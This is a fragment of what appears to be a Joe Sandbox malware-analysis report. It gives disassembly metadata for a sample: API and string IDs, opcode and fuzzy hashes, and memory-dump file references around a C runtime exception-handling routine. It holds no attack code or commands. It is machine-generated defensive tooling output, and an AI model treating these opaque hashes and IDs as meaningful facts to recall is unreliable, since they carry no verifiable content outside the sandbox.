                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 3480331319-1018135373
                                                            • Opcode ID: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                            • Instruction ID: 293862e0193fea5f000c4f1ec50b6799ada1ed4616923ab0728ef82165f82674
                                                            • Opcode Fuzzy Hash: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
                                                            • Instruction Fuzzy Hash: 7041B374E05219ABCF10DF68C880F9EBBB5AF45314F1481AAE8189B392D775DE05CB92
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009E9B0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ___except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3493665558-3733052814
                                                            • Opcode ID: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                            • Instruction ID: 012111d792a9b00c782640be0efbaa997b2f39930160b55cbdaa9e906d4c2ee1
                                                            • Opcode Fuzzy Hash: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
                                                            • Instruction Fuzzy Hash: 2931D372800299EBCF239F52EC459BA7B6AFF09315B1C815AF8544A221C336DCA1DB81